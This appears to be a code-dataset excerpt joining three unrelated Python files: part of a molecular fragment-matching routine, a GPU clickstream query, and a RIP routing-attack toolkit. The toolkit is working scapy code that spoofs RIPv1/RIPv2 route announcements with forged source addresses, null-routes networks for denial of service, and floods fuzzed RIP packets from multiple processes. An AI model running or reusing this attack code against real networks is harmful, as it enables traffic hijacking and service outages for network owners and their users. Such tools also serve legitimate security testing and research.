verbose_bin.append("ring closure")
current_atom_data.ring_closures.add((ring_closure_counter, unchecked_bonds[0].bond_code))
atom_info_dict[unchecked_bonds[0].atom].ring_closures.add((ring_closure_counter, unchecked_bonds[0].bond_code))
ring_closure_counter += 1
# same as above
else:
verbose_bin.append("new branch")
for bond in unchecked_bonds:
new_branch(bond.atom, current_atom, current_atom_data, bond.bond_code)
# if the anchor atom only has 1 bond, need to start a branch
else:
verbose_bin.append("end point")
if not current_branch:
return current_atom_data
# this returns the anchor atom to the map_fragment function, as the anchor atom is not spawned from a branch
def new_branch(current_atom, previous_atom, previous_atom_data, bond_code):
current_branch = Branch((bond_code, current_atom.symbol))
# create new branch with bonding info to first atom in branch
previous_atom_data.daughter_branches.append(current_branch)
# add new branch to the atom which spawned it
traverse(current_atom, previous_atom, current_branch)
# start traverse on first atom in branch
# need to pass previous_atom in order to not travel backwards
return traverse(anchor_atom, None, None)
# starts process of mapping fragment, but also returns the anchor atom
anchored_fragment_map = map_fragment(fragment_structure, fragment_anchor_atom)
# the map base is the atom_data representation of the anchor atom
# the rest of the map is stored in the daughter branches
def expand_map(anchor_atom):
verbose_bin.append("anchor atom")
verbose_bin.append(anchor_atom.symbol)
if len(anchor_atom.ring_closures) > 0:
verbose_bin.append("ring closures:")
for num in anchor_atom.ring_closures:
verbose_bin.append(num)
if anchor_atom.phantom_bonds:
verbose_bin.append(f"phantom bonds = {anchor_atom.phantom_bonds}")
def expand_branch_point(atom_map):
for branch in atom_map.daughter_branches:
verbose_bin.append("branch:")
verbose_bin.append(f"branch length: {len(branch.sequence)}")
verbose_bin.append(f"total branch length: {calc_branch_length(branch)}")
verbose_bin.append(f"bond to branch: {branch.bond}")
for atom_info in branch.sequence:
verbose_bin.append(atom_info.symbol)
if len(atom_info.ring_closures) > 0:
verbose_bin.append("ring closures:")
for num in atom_info.ring_closures:
verbose_bin.append(num)
if atom_info.phantom_bonds:
verbose_bin.append(f"phantom bonds = {atom_info.phantom_bonds}")
if atom_info.bond:
verbose_bin.append(atom_info.bond)
if len(atom_info.daughter_branches) > 0:
verbose_bin.append("branch point")
expand_branch_point(atom_info)
expand_branch_point(anchor_atom)
verbose_bin.append("\nexpanded map:\n")
expand_map(anchored_fragment_map)
def check_anchor_atom(potential_anchor_atom, fragment_map):
molecule_atoms = {potential_anchor_atom}
# list to keep track of which atoms in the molecule constitute a matched fragment
currently_visited = {potential_anchor_atom: fragment_map}
# dictionary that keeps track of which atoms have been used to find the fragment at any given step
def check_branch_point(current_molecule_atom, previous_molecule_atom, map_atom_info, branch_atoms):
if map_atom_info.phantom_bonds:
bond_num = len(current_molecule_atom.bonded_to)
if bond_num != map_atom_info.phantom_bonds:
verbose_bin.append("wrong amount of phantom bonds")
return False
# phantom_bonds is a way to ensure the current atom is bonded to the specified number of atoms
# note that phantom bonds includes any bonds for the current molecule_atom, including those to atoms that are "discovered"
branch_point_atoms = set()
nonlocal currently_visited
verbose_bin.append("I'm trying a branch point")
map_atom_info.daughter_branches.sort(key=calc_branch_length, reverse=True)
# this makes longer branches go first -> have to search the longest branch first
# otherwise a shorter branch might be identified in what is actually the long branch
# i.e. if atom has ethyl and propyl group, you could find the ethyl group where the propyl group is and then be unable to find propyl group
# also important - need to calculate the total branch length (including the length of all its daughter branches)
verbose_bin.append("branch point bonds check")
unchecked_bonds = Counter([abbr_bond(bond) for bond in current_molecule_atom.bonded_to if bond.atom != previous_molecule_atom])
fragment_branch_point_bonds = Counter([branch.bond for branch in map_atom_info.daughter_branches])
verbose_bin.append(unchecked_bonds)
verbose_bin.append(fragment_branch_point_bonds)
# subset check on branch point, just to make sure current atom has all the bonds the fragment branchpoint has
for key in fragment_branch_point_bonds:
if key[1] != "R" and key[1] != "Q" and key[0] != 9: # TODO better way to do this?
if key not in unchecked_bonds or fragment_branch_point_bonds[key] > unchecked_bonds[key]:
verbose_bin.append("branch point doesn't contain necessary bonds")
return False
branch_check = {}
for branch in map_atom_info.daughter_branches:
branch_check[branch] = False
# set all branches to unconfirmed
trial_paths = [bond for bond in current_molecule_atom.bonded_to if bond.atom != previous_molecule_atom]
# available routes to see if branch matches
checked_paths = []
# keeps track of bonds that have been used to successfully identify branches
for branch in map_atom_info.daughter_branches:
# take each branch
for bond in trial_paths:
if check_bond(bond, branch.bond, branch.sequence[0]) and bond not in checked_paths and bond.atom not in currently_visited:
# if the bond to the branch matches the current bond (and the current bond hasn't already been used to identify a branch):
if try_branch(branch.sequence, bond.atom, current_molecule_atom, branch_point_atoms):
# test to see if the current branch works on this bond path
verbose_bin.append("branch successful")
branch_check[branch] = True
checked_paths.append(bond)
# if true, the branch was successfully found, turn branch to True in branch check
# add bond used to checked_paths so it isn't used for further branches
break
# need to stop the for loop so it doesn't search the matched branch in further trial_paths
else:
verbose_bin.append("branch not successful")
if all(value is True for value in branch_check.values()):
verbose_bin.append("branch point match")
if branch_atoms:
branch_atoms.update(branch_point_atoms)
else:
molecule_atoms.update(branch_point_atoms)
# first branch point does not have a branch that spawned it
return True
# if all branches have been found, they will be True in branch_check, branch point is a match, return True
else:
verbose_bin.append("branch point not matched")
return False
# one or more branches were found, branch point wasn't a match, return False
def try_branch(branch_sequence, current_molecule_atom, previous_molecule_atom, branch_point_atoms):
branch_atoms = set()
verbose_bin.append("I'm trying a branch!")
if check_atom_bonds(current_molecule_atom, previous_molecule_atom, branch_sequence, 0, branch_atoms):
branch_point_atoms.update(branch_atoms)
# add branch_atoms to branch point_atoms
return True
else:
nonlocal currently_visited
for a in branch_atoms:
currently_visited.pop(a)
def check_ring_closure(current_atom, atom_info): # already check if atom_info has ring closure
ring_closures = set() # all the ring closure numbers in currently_visited
for value in currently_visited.values():
ring_closures.update(value.ring_closures)
for closure_info in atom_info.ring_closures: # checking each ring closure atom has
verbose_bin.append("ring closure")
verbose_bin.append(closure_info)
if closure_info in ring_closures: # we've already hit the other half of the ring closure
for key in currently_visited: # looking for matching ring closure
if closure_info in currently_visited[key].ring_closures: # matched ring closure, key = atom it should be bonded to
ring_closure_partner = key
if ring_closure_partner in [bond.atom for bond in current_atom.bonded_to]:
ring_closure_bond = None
for bond in current_atom.bonded_to:
if bond.atom == ring_closure_partner:
ring_closure_bond = bond
if ring_closure_bond.bond_code != closure_info[1] and closure_info[1] != 9:
verbose_bin.append("closure bond incorrect")
return False
else:
verbose_bin.append("atom not bonded to correct closure partner")
return False
else:
return True
# first time encountering that ring closure number, don't need to do any further checks
verbose_bin.append("all ring closures acounted for")
return True
def check_atom_bonds(current_molecule_atom, previous_molecule_atom, branch_sequence, index, branch_atoms):
verbose_bin.append("checking atom")
verbose_bin.append(current_molecule_atom.symbol)
nonlocal currently_visited
current_atom_info = branch_sequence[index]
if current_atom_info.phantom_bonds:
bond_num = len(current_molecule_atom.bonded_to)
if bond_num != current_atom_info.phantom_bonds:
verbose_bin.append("wrong amount of phantom bonds")
return False
if current_atom_info.ring_closures:
if not check_ring_closure(current_molecule_atom, current_atom_info):
return False
currently_visited[current_molecule_atom] = current_atom_info
for a in currently_visited:
verbose_bin.append(a.symbol)
if currently_visited[a].ring_closures:
verbose_bin.append(currently_visited[a].ring_closures)
verbose_bin.append("\n")
branch_atoms.add(current_molecule_atom)
if len(current_atom_info.daughter_branches) > 0:
# atom is branch point and need to check branches
return check_branch_point(current_molecule_atom, previous_molecule_atom, current_atom_info, branch_atoms)
else:
# atom is either an endpoint or contiguous segment:
if not current_atom_info.bond:
verbose_bin.append("reached branch end")
# if no bond data, means we have matched the entire branch, return True
return True
else:
# else: this is a contiguous segment look for appropriate bonds
unchecked_bonds = [bond for bond in current_molecule_atom.bonded_to if bond.atom != previous_molecule_atom]
if len(unchecked_bonds) == 0:
verbose_bin.append("branch ended too early")
# actual branch has ended, but map says there should be another atom bonded here, therefore return False
return False
elif len(unchecked_bonds) == 1:
# actual molecule only has a contiguous segment here
verbose_bin.append(current_atom_info.bond)
verbose_bin.append(abbr_bond(unchecked_bonds[0]))
if check_bond(unchecked_bonds[0], current_atom_info.bond, branch_sequence[index + 1]) and unchecked_bonds[0].atom not in currently_visited:
return check_atom_bonds(unchecked_bonds[0].atom, current_molecule_atom, branch_sequence, index + 1, branch_atoms) # check next atom
# all branches should either return a function, True, or False. All child functions should do the same
# uncheck_bonds[0].atom becomes new current_molecule_atom, current_molecule_atom becomes previous_molecule_atom
# also pass the branch sequence and the index of the next atom_info in the branch
else:
verbose_bin.append("wrong bond or already visited")
return False
# the next atom in the branch either has the wrong bond or atom symbol
else:
# there are multiple possible paths branch could go
verbose_bin.append("checking multiple paths for branch")
# check all ways
for bond in unchecked_bonds:
if current_atom_info.bond != abbr_bond(bond): # this is purely for seeing what's happening
verbose_bin.append(abbr_bond(bond))
verbose_bin.append(current_atom_info.bond)
if check_bond(bond, current_atom_info.bond, branch_sequence[index + 1]) and bond.atom not in currently_visited:
verbose_bin.append(abbr_bond(bond))
verbose_bin.append(current_atom_info.bond)
# looks at all possible ways that match the correct bond
midway_fork = set()
# need to separate the branch_atoms here since we don't know if any of the paths will work
if check_atom_bonds(bond.atom, current_molecule_atom, branch_sequence, index + 1, midway_fork):
branch_atoms.update(midway_fork)
# if one of the paths works, add all the atoms from the midway_fork "branch"
return True
# return True if any of the paths work (also returns first found)
else:
for a in midway_fork:
currently_visited.pop(a)
# if midway_fork doesn't work, need to remove those atoms from currently_visited
return False
# if this else clause didn't return True (i.e. none of the paths succeeded)
# then none of the paths are productive, return false
if check_branch_point(potential_anchor_atom, None, fragment_map, None):
verbose_bin.append("phantom atom check")
for atom in currently_visited:
if not currently_visited[atom].phantom_atom:
# using currently visited to see if the atom_data that was used to find that atom was marked as a phantom_atom
# if it is a phantom atom, don't mark as discovered
atom.discovered = True
else:
verbose_bin.append("this atom should not be counted")
# running checks
verbose_bin.append(f"number of atoms in fragment: {len(molecule_atoms)}")
molecule_atoms2 = [atom.symbol for atom in molecule_atoms]
molecule_atoms2phantom = [atom.phantom_atom for atom in molecule_atoms]
if (len(molecule_atoms)) != len(currently_visited):
verbose_bin.append("error in number of atoms found")
for atom in molecule_atoms:
if atom not in currently_visited:
verbose_bin.append("error: descrepancy between currently_visited and molecule_atoms")
for atom in molecule_atoms:
verbose_bin.append(atom.symbol)
verbose_bin.append("matched fragment to anchor atom")
return Fragment(fragment_name, list(molecule_atoms)) # TODO currently this includes atoms that were found via phantom atoms (unclear if this is wanted behavior)
else:
verbose_bin.append("anchor atom not matched to fragment")
return False
# start from check_branch point on the potential anchor atom
# the anchor atom in map is treated as a branch point, even if it only has 1 branch
fragment_counter = 0
fragments_identified = []
for atom in potential_anchor_atoms:
verbose_bin.append("checking anchor atom")
for bond in atom.bonded_to:
verbose_bin.append(abbr_bond(bond))
is_found_fragment = check_anchor_atom(atom, anchored_fragment_map)
if is_found_fragment:
# add atoms found to fragment
fragment_counter += 1
fragments_identified.append(is_found_fragment)
verbose_bin.append(f"\nnumber of fragments found: {fragment_counter}")
if verbose:
for item in verbose_bin:
print(item)
return fragments_identified
def fragmentize(molecule_string, *fragment_libraries, numeric=False, verbose=False):
molecule_structure = convert_to_structure(MoleculeStructure(), molecule_string)
fragments = []
fragment_names = []
fragments_counter = []
generalized_heterocycles_found = []
for lib in fragment_libraries:
if lib != generalized_heterocycles:
for frag in lib:
frag_num = 0
for frag_res_structure in lib[frag]:
frag_res_found = find_fragment(frag_res_structure, None, frag, structure=molecule_structure, verbose=verbose)
if frag_res_found:
frag_num += len(frag_res_found)
# can find multiples of a fragment
for f in frag_res_found:
fragments.append(f)
fragment_names.append(f.name)
fragments_counter.append(frag_num)
# for generalized heterocycles
else:
for frag in lib:
for frag_res_structure in lib[frag]:
frag_res_found = find_fragment(frag_res_structure, None, frag, structure=molecule_structure, verbose=verbose)
if frag_res_found:
for f in frag_res_found:
f.generalize_heterocycle_name()
generalized_heterocycles_found.append(f)
# possible varieties of generalized heterocycles
# name format: X-Y+ZM-het where X is number of heteroatoms, Y is the number of atoms in the ring and
# Z is the number of atoms in the fused ring
generalized_heterocycles_names = ["0-5M-het", "1-5M-het", "2-5M-het", "3-5M-het", "4-5M-het",
"0-6M-het", "1-6M-het", "2-6M-het", "3-6M-het", "4-6M-het",
"0-6+5M-het", "1-6+5M-het", "2-6+5M-het", "3-6+5M-het", "4-6+5M-het", "5-6+5M-het", "6-6+5M-het",
"0-6+6M-het", "1-6+6M-het", "2-6+6M-het", "3-6+6M-het", "4-6+6M-het", "5-6+6M-het", "6-6+6M-het"]
generalized_heterocycles_found_dict = {k:0 for k in generalized_heterocycles_names}
for heterocycle in generalized_heterocycles_found:
generalized_heterocycles_found_dict[heterocycle.name] += 1
fragments.append(heterocycle)
fragment_names.append(heterocycle.name)
for key in generalized_heterocycles_found_dict:
fragments_counter.append(generalized_heterocycles_found_dict[key])
molecule_structure.fragments_list = fragments
atoms_not_discovered = 0
for atom in molecule_structure.atom_list:
if not atom.discovered:
atoms_not_discovered += 1
if atoms_not_discovered > 0:
# total_frags = 0
# for lib in fragment_libraries:
# total_frags += len(lib)
cprint(f"atoms not found: {atoms_not_discovered}", "red")
cprint(molecule_string, 'red')
# return ["NA" for _ in range(total_frags)]
if numeric:
return fragments_counter, molecule_structure
else:
return fragment_names, molecule_structure
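# A usage sketch (illustrative only): "my_library" below is a stand-in for a fragment
# library shaped the way the loops above expect (a mapping of fragment name -> list of
# resonance structures), and molecule_string uses whatever notation convert_to_structure
# accepts in this code base.
#
#   names, structure = fragmentize(molecule_string, my_library)
#   counts, structure = fragmentize(molecule_string, my_library, numeric=True)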
|
py | 1a4fb3870f8a267bd0a9b9419eebe985a7b281f1 | #
# Copyright (c) 2019-2022, NVIDIA CORPORATION.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import cudf
from numba import cuda
from bdb_tools.readers import build_reader
q03_days_in_sec_before_purchase = 864000
q03_views_before_purchase = 5
q03_purchased_item_IN = 10001
q03_purchased_item_category_IN = 2, 3
q03_limit = 100
def read_tables(config, c=None):
table_reader = build_reader(
data_format=config["file_format"],
basepath=config["data_dir"],
split_row_groups=config["split_row_groups"],
)
item_cols = ["i_category_id", "i_item_sk"]
wcs_cols = [
"wcs_user_sk",
"wcs_click_time_sk",
"wcs_click_date_sk",
"wcs_item_sk",
"wcs_sales_sk",
]
item_df = table_reader.read("item", relevant_cols=item_cols)
wcs_df = table_reader.read("web_clickstreams", relevant_cols=wcs_cols)
if c:
c.create_table("web_clickstreams", wcs_df, persist=False)
c.create_table("item", item_df, persist=False)
return item_df
@cuda.jit
def find_items_viewed_before_purchase_kernel(
relevant_idx_col, user_col, timestamp_col, item_col, out_col, N
):
"""
Find the past N items viewed after a relevant purchase was made,
as defined by the configuration of this query.
"""
i = cuda.grid(1)
if i < (relevant_idx_col.size): # boundary guard
# every relevant row gets N rows in the output, so we need to map the indexes
# back into their position in the original array
orig_idx = relevant_idx_col[i]
current_user = user_col[orig_idx]
# look at the previous N clicks (assume sorted descending)
rows_to_check = N
remaining_rows = user_col.size - orig_idx
if remaining_rows <= rows_to_check:
rows_to_check = remaining_rows - 1
for k in range(1, rows_to_check + 1):
if current_user != user_col[orig_idx + k]:
out_col[i * N + k - 1] = 0
# only checking relevant purchases via the relevant_idx_col
elif (timestamp_col[orig_idx + k] <= timestamp_col[orig_idx]) & (
timestamp_col[orig_idx + k]
>= (timestamp_col[orig_idx] - q03_days_in_sec_before_purchase)
):
out_col[i * N + k - 1] = item_col[orig_idx + k]
else:
out_col[i * N + k - 1] = 0
def apply_find_items_viewed(df, item_mappings):
# need to sort descending to ensure that the
# next N rows are the previous N clicks
df = df.sort_values(
by=["wcs_user_sk", "tstamp", "wcs_sales_sk", "wcs_item_sk"],
ascending=[False, False, False, False],
)
df.reset_index(drop=True, inplace=True)
df["relevant_flag"] = (df.wcs_sales_sk != 0) & (
df.wcs_item_sk == q03_purchased_item_IN
)
df["relevant_idx_pos"] = df.index.to_series()
df.reset_index(drop=True, inplace=True)
# only allocate output for the relevant rows
sample = df.loc[df.relevant_flag == True]
sample.reset_index(drop=True, inplace=True)
N = q03_views_before_purchase
size = len(sample)
# we know this can be int32, since it's going to contain item_sks
out_arr = cuda.device_array(size * N, dtype=df["wcs_item_sk"].dtype)
find_items_viewed_before_purchase_kernel.forall(size)(
sample["relevant_idx_pos"],
df["wcs_user_sk"],
df["tstamp"],
df["wcs_item_sk"],
out_arr,
N,
)
result = cudf.DataFrame({"prior_item_viewed": out_arr})
del out_arr
del df
del sample
filtered = result.merge(
item_mappings,
how="inner",
left_on=["prior_item_viewed"],
right_on=["i_item_sk"],
)
return filtered
|
py | 1a4fb411975f9d81c6dee063f9adea912577ed27 | #!/usr/bin/python
#
# Currently implemented attacks:
# - sniffer - (NOT YET IMPLEMENTED) Sniffer hunting for authentication strings
# - ripv1-route - Spoofed RIPv1 Route Announcements
# - ripv1-dos - RIPv1 Denial of Service via Null-Routing
# - ripv1-ampl - RIPv1 Reflection Amplification DDoS
# - ripv2-route - Spoofed RIPv2 Route Announcements
# - ripv2-dos - RIPv2 Denial of Service via Null-Routing
# - rip-fuzzer - RIPv1/RIPv2 protocol fuzzer, covering RIPAuth and RIPEntry structures fuzzing
#
# Python requirements:
# - scapy
#
# Mariusz B. / mgeeky, '19, <[email protected]>
#
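#
# Example invocations (a sketch: the script name, interface and addresses below are
# placeholders; the flags correspond to the argparse options defined in parseOptions):
#   python rip-toolkit.py -t ripv2-route -i eth0 -a 10.0.0.0 -b 255.255.255.0 -c 192.168.1.5 -m 1
#   python rip-toolkit.py -t rip-fuzzer -i eth0
#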
import sys
import os
import time
import socket
import fcntl
import struct
import string
import random
import commands
import argparse
import multiprocessing
try:
from scapy.all import *
except ImportError:
print('[!] Scapy required: pip install scapy')
sys.exit(1)
VERSION = '0.1'
config = {
'verbose' : False,
'debug' : False,
'delay' : 1.0,
'interface': None,
'processors' : 8,
'network': '',
'spoof': '',
'nexthop': '',
'netmask': '',
'metric': 0,
'auth-type': '',
'auth-data': '',
}
attacks = {}
stopThreads = False
#
# ===============================================
#
def flooder(num, packets):
Logger.dbg('Starting task: {}, packets num: {}'.format(num, len(packets)))
for p in packets:
if stopThreads: break
try:
if stopThreads:
raise KeyboardInterrupt
sendp(p, verbose = False)
if len(p) < 1500:
Logger.dbg("Sent: \n" + str(p))
except KeyboardInterrupt:
break
except Exception as e:
pass
Logger.dbg('Stopping task: {}'.format(num))
class Logger:
@staticmethod
def _out(x):
if config['verbose'] or config['debug']:
sys.stdout.write(x + '\n')
@staticmethod
def out(x):
Logger._out('[.] ' + x)
@staticmethod
def info(x):
Logger._out('[.] ' + x)
@staticmethod
def dbg(x):
if config['debug']:
Logger._out('[dbg] ' + x)
@staticmethod
def err(x):
sys.stdout.write('[!] ' + x + '\n')
@staticmethod
def fail(x):
Logger._out('[-] ' + x)
@staticmethod
def ok(x):
Logger._out('[+] ' + x)
# Well, not very fuzzy that fuzzer I know.
class Fuzzer:
@staticmethod
def get8bitFuzzes():
out = set()
for i in range(9):
out.add(2 ** i - 1)
out.add(2 ** i - 2)
out.add(2 ** i)
out.add(2 ** i + 1)
#out.add(2 ** i + 2)
return [k for k in out if abs(k) < 2**8]
@staticmethod
def get16bitFuzzes():
out = set()
for i in range(17):
out.add(2 ** i - 1)
out.add(2 ** i - 2)
out.add(2 ** i)
out.add(2 ** i + 1)
#out.add(2 ** i + 2)
return [k for k in out if abs(k) < 2**16]
@staticmethod
def get32bitFuzzes():
out = set()
for i in range(33):
out.add(2 ** i - 1)
out.add(2 ** i - 2)
out.add(2 ** i)
out.add(2 ** i + 1)
#out.add(2 ** i + 2)
return [k for k in out if abs(k) < 2**32]
@staticmethod
def deBrujinPattern(length):
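        # e.g. deBrujinPattern(9) -> 'Aa0Aa1Aa2': cyclic upper/lower/digit triplets,
        # truncated to the requested length, so offsets stay recognizable in output.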
if length == 0: return ''
if length >= 20280:
out = ''
out += Fuzzer.deBrujinPattern(20280 - 1)
out += "A" * (length - 20280 - 1)
return out
pattern = ''
for upper in string.ascii_uppercase:
for lower in string.ascii_lowercase:
for digit in string.digits:
if len(pattern) < length:
pattern += upper + lower + digit
else:
out = pattern[:length]
return out
return pattern
@staticmethod
def getFuzzyStrings(maxLen = -1, allOfThem = True):
out = set()
for b in Fuzzer.get16bitFuzzes():
out.add(Fuzzer.deBrujinPattern(b))
if allOfThem:
for b in range(0, 65400, 256):
if maxLen != -1 and b > maxLen: break
out.add(Fuzzer.deBrujinPattern(b))
if maxLen != -1:
return set([x for x in out if len(x) <= maxLen])
return out
@staticmethod
def get32bitProblematicPowersOf2():
return Fuzzer.get32bitFuzzes()
class RoutingAttack:
def __init__(self):
pass
def injectOptions(self, params, config):
pass
def launch(self):
pass
class Sniffer(RoutingAttack):
def __init__(self):
pass
def injectOptions(self, params, config):
self.config = config
self.config.update(params)
def processPacket(pkt):
# TODO
raise Exception('Not yet implemented.')
def launch(self):
# TODO
raise Exception('Not yet implemented.')
def packetCallback(d):
self.processPacket(d)
try:
pkts = sniff(
count = 1000,
filter = 'udp port 520',
timeout = 10.0,
prn = packetCallback,
iface = self.config['interface']
)
except Exception as e:
if 'Network is down' in str(e):
pass
else:
Logger.err('Exception occured during sniffing: {}'.format(str(e)))
except KeyboardInterrupt:
pass
class RIPv1v2Attacks(RoutingAttack):
ripAuthTypes = {
'simple' : 2, 'md5' : 3, 'md5authdata': 1
}
def __init__(self):
self.config = {
'interface' : '',
'delay': 1,
'network' : '',
'metric' : 10,
'netmask' : '255.255.255.0',
'nexthop' : '0.0.0.0',
'spoof' : '',
'version' : 0,
}
@staticmethod
def getRipAuth(config):
ripauth = RIPAuth()
ripauth.authtype = RIPv1v2Attacks.ripAuthTypes[config['auth-type']]
if ripauth.authtype == 2:
ripauth.password = config['auth-data']
elif ripauth.authtype == 1:
ripauth.authdata = config['auth-data']
elif ripauth.authtype == 3:
ripauth.digestoffset = 0
ripauth.keyid = 0
ripauth.authdatalen = len(config['auth-data'])
ripauth.seqnum = 0
return ripauth
def injectOptions(self, params, config):
self.config = config
self.config.update(params)
Logger.info("Fake Route Announcement to be injected:")
Logger.info("\tNetwork: {}".format(config['network']))
Logger.info("\tNetmask: {}".format(config['netmask']))
Logger.info("\tNexthop: {}".format(config['nexthop']))
Logger.info("\tMetric: {}".format(config['metric']))
if not config['network'] or not config['netmask'] \
or not config['nexthop'] or not config['metric']:
Logger.err("Module needs following options to operate: network, netmask, nexthop, metric")
return False
if params['version'] != 1 and params['version'] != 2:
Logger.err("RIP protocol version must be either 1 or 2 as passed in attacks params!")
return False
return True
def launch(self):
packet = self.getPacket()
Logger.info("Sending RIPv{} Spoofed Route Announcements...".format(self.config['version']))
sendp(packet, loop = 1, inter = self.config['delay'], iface = config['interface'])
def getPacket(self):
networkToAnnounce = self.config['network']
metricToAnnounce = self.config['metric']
netmaskToAnnounce = self.config['netmask']
nexthopToAnnounce = self.config['nexthop']
spoofedIp = self.config['spoof']
etherframe = Ether() # Start definition of Ethernet Frame
ip = IP() # IPv4 packet
udp = UDP()
udp.sport = 520 # According to RFC1058, 520/UDP port must be used for solicited communication
udp.dport = 520
rip = RIP()
ripentry = RIPEntry() # Announced route
ripentry.AF = "IP" # Address Family: IP
if 'AF' in self.config.keys():
ripentry.AF = self.config['AF']
ripentry.addr = networkToAnnounce # Spoof route for this network...
ripentry.metric = metricToAnnounce
if self.config['version'] == 1:
ip.dst = '255.255.255.255' # RIPv1 broadcast destination
etherframe.dst = 'ff:ff:ff:ff:ff:ff'
rip.version = 1 # RIPv1
rip.cmd = 2 # Command: Response
elif self.config['version'] == 2:
ip.dst = '224.0.0.9' # RIPv2 multicast destination
rip.version = 2 # RIPv2
rip.cmd = 2 # Command: Response
ripentry.RouteTag = 0
ripentry.mask = netmaskToAnnounce
ripentry.nextHop = nexthopToAnnounce # ... to be going through this next hop device.
if 'rip_cmd' in self.config.keys():
rip.cmd = self.config['rip_cmd']
if not self.config['auth-type']:
rip_packet = etherframe / ip / udp / rip / ripentry
else:
ripauth = RIPv1v2Attacks.getRipAuth(self.config)
Logger.info('Using RIPv2 authentication: type={}, pass="{}"'.format(
self.config['auth-type'], self.config['auth-data']
))
rip_packet = etherframe / ip / udp / rip / ripauth / ripentry
rip_packet[IP].src = spoofedIp
return rip_packet
class RIPFuzzer(RoutingAttack):
ripCommands = (
1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11
)
def __init__(self):
self.config = {
'interface' : '',
'network' : '192.168.1.0',
'metric' : 10,
'netmask' : '255.255.255.0',
'nexthop' : '0.0.0.0',
'spoof' : '',
}
def injectOptions(self, params, config):
self.config = config
self.params = params
return True
    def launch(self):
        global stopThreads
        packets = set()
Logger.info("Generating fuzzed packets for RIPv1...")
packets.update(self.generateRipv1Packets())
Logger.info("Generating fuzzed packets for RIPv2...")
packets.update(self.generateRipv2Packets())
Logger.info("Collected in total {} packets to send. Sending them out...".format(len(packets)))
packetsLists = [[] for x in range(self.config['processors'])]
packetsList = list(packets)
for i in range(len(packetsList)):
packetsLists[i % config['processors']].append(packetsList[i])
jobs = []
for i in range(config['processors']):
task = multiprocessing.Process(target = flooder, args = (i, packetsLists[i]))
jobs.append(task)
task.daemon = True
task.start()
print('[+] Started flooding. Press CTRL-C to stop that.')
try:
while jobs:
jobs = [job for job in jobs if job.is_alive()]
except KeyboardInterrupt:
stopThreads = True
print('\n[>] Stopping...')
stopThreads = True
time.sleep(3)
Logger.ok("Fuzzing finished. Sent around {} packets.".format(len(packets)))
def generateRipv1Packets(self):
packets = set()
base = Ether(dst = 'ff:ff:ff:ff:ff:ff') / IP(dst = '255.255.255.255') / UDP(sport = 520, dport = 520)
# Step 1: Fuzz on Command values.
for val in set(RIPFuzzer.ripCommands + tuple(Fuzzer.get8bitFuzzes())):
rip = RIP(version = 1, cmd = val)
packets.add(base / rip)
packets.add(base / rip / RIPEntry() )
# Step 1b: Fuzz on Command values with packet filled up with data
for val in set(RIPFuzzer.ripCommands + tuple(Fuzzer.get8bitFuzzes())):
rip = RIP(version = 1, cmd = val)
for data in Fuzzer.getFuzzyStrings():
if not data: data = ''
packets.add(base / rip / data)
packets.add(base / rip / RIPEntry() / data)
# Step 2: Fuzz on Response RIPEntry AF values.
for val in set(Fuzzer.get8bitFuzzes()):
rip = RIP(version = 1, cmd = 2)
packets.add(base / rip / RIPEntry(AF = val) )
# Step 3: Fuzz on Response RIPEntry RouteTag values.
for val in set(Fuzzer.get8bitFuzzes()):
rip = RIP(version = 1, cmd = 2)
packets.add(base / rip / RIPEntry(RouteTag = val) )
# Step 4: Fuzz on Response RIPEntry metric values.
for val in set(Fuzzer.get8bitFuzzes()):
rip = RIP(version = 1, cmd = 2)
packets.add(base / rip / RIPEntry(metric = val) )
# Step 5: Add multiple RIPEntry structures
for num in Fuzzer.get32bitProblematicPowersOf2():
rip = RIP(version = 1, cmd = 2)
entries = []
try:
ipv4 = socket.inet_ntoa(struct.pack('!L', num))
except:
ipv4 = '127.0.0.2'
if (num * 20) > 2 ** 16:
break
for i in range(num):
entries.append(RIPEntry(addr = ipv4))
packets.add(base / rip / ''.join([str(x) for x in entries]))
return packets
def generateRipv2Packets(self):
packets = set()
base = Ether() / IP(src = self.config['spoof'], dst = '224.0.0.9') / UDP(sport = 520, dport = 520)
# Step 1: Fuzz on Command values.
for val in set(RIPFuzzer.ripCommands + tuple(Fuzzer.get8bitFuzzes())):
rip = RIP(version = 2, cmd = val)
packets.add(base / rip)
packets.add(base / rip / RIPEntry() )
# Step 1b: Fuzz on Command values with packet filled up with data
for val in set(RIPFuzzer.ripCommands + tuple(Fuzzer.get8bitFuzzes())):
rip = RIP(version = 2, cmd = val)
for data in Fuzzer.getFuzzyStrings():
if not data: data = ''
packets.add(base / rip / data)
packets.add(base / rip / RIPEntry() / data)
# Step 2: Fuzz on Version values.
for val in set(Fuzzer.get8bitFuzzes()):
rip = RIP(version = val, cmd = 1)
packets.add(base / rip)
packets.add(base / rip / RIPEntry() )
# Step 3: Fuzz on Authentication data values.
for val in set(Fuzzer.get8bitFuzzes()):
rip = RIP(version = val, cmd = 1)
for auth in RIPFuzzer.fuzzRipv2Auth():
packets.add(base / rip / auth )
packets.add(base / rip / auth / RIPEntry() )
# Step 4: Fuzz on Response RIPEntry AF values.
for val in set(Fuzzer.get8bitFuzzes()):
rip = RIP(version = 2, cmd = 2)
packets.add(base / rip / RIPEntry(AF = val) )
# Step 5: Fuzz on Response RIPEntry RouteTag values.
for val in set(Fuzzer.get8bitFuzzes()):
rip = RIP(version = 2, cmd = 2)
packets.add(base / rip / RIPEntry(RouteTag = val) )
# Step 6: Fuzz on Response RIPEntry metric values.
for val in set(Fuzzer.get8bitFuzzes()):
rip = RIP(version = 2, cmd = 2)
packets.add(base / rip / RIPEntry(metric = val) )
# Step 7: Add multiple RIPEntry structures
for num in Fuzzer.get32bitProblematicPowersOf2():
rip = RIP(version = 2, cmd = 2)
entries = []
try:
ipv4 = socket.inet_ntoa(struct.pack('!L', num))
except:
ipv4 = '127.0.0.2'
if (num * 20) > 2 ** 16:
break
for i in range(num):
entries.append(RIPEntry(addr = ipv4))
packets.add(base / rip / ''.join([str(x) for x in entries]))
return packets
@staticmethod
def fuzzRipv2Auth():
auths = set()
# Step 1: Fuzz on RIPAuth authtype.
for val in set(Fuzzer.get8bitFuzzes()):
ripauth = RIPAuth()
ripauth.authtype = val
ripauth.password = '0123456789abcdef'
auths.add(ripauth)
